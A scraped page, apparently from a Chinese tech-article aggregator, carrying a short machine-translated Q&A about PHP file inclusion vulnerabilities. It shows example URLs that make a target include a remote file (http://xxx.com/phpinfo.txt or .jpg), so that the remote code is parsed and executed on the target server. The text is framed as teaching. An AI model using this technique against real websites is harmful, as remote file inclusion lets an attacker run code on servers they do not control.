当前位置:网站首页>File contains vulnerability issues
File contains vulnerability issues
2022-06-24 23:17:00 【Class hi Education】
A student asked a question before , The file contains whether the vulnerability can be loaded php file , Later, I answered this question on YuQue

When using File Inclusion Vulnerability to include remote files, such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.php
phpinfo Whether the printed information is local information ?
answer : no
The contents contained in our remote file are as follows php Parse the rendered , If you directly pull the executed php That will get the result directly , So, oh, we pull them in other formats , Such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.txt
http://localhost/index.php/?filename=http://xxx.com/phpinfo.jpg
And so on, so that the content can be parsed into php. Switch to jsp The same applies to type websites
边栏推荐
- 二分查找数组下标
- Detailed explanation of online group chat and dating platform project (servlet implementation)
- 01_ Getting started with the spingboot framework
- Docker installation MySQL simple without pit
- Research and investment strategy report on China's bridge anticorrosive coating industry (2022 Edition)
- Laravel message queue
- [laravel series 7.9] test
- The large-scale market of graduate dormitory! Here comes the enviable graduate dormitory!
- Financial management [1]
- Getting started with the go Cobra command line tool
猜你喜欢

2022 simulated 100 questions and simulated examination of high-altitude installation, maintenance and demolition

【js】-【树】-学习笔记

vulnhub DC: 2

宁德时代定增450亿:高瓴认购30亿 曾毓群仍控制23%股权
Paddledtx v1.0 has been released, and its security and flexibility have been comprehensively improved!

EMI的主要原因-工模电流

斐波那契

伪原创智能改写api百度-收录良好

非单文件组件
![[laravel series 7.9] test](/img/49/4b470a8b309bab4a83eed930dcce65.png)
[laravel series 7.9] test
随机推荐
案例解析:用「度量」提升企业研发效能|ONES Talk
laravel 创建 service层
07_ Springboot for restful style
Push markdown format information to the nailing robot
jar中没有主清单属性
【js】-【数组应用】-学习笔记
二分查找数组下标
07_SpingBoot 实现 RESTful 风格
慕思股份深交所上市:靠床垫和“洋老头”走红 市值224亿
The large-scale market of graduate dormitory! Here comes the enviable graduate dormitory!
【nvm】
UNION ALL UNION FULL JOIN
Financial management [2]
[ROS play with turtle turtle]
Docker installation MySQL simple without pit
Accounting standards for business enterprises application [5]
Concurrent shared model management
基本数据类型
#22Map介绍与API
F29oc analysis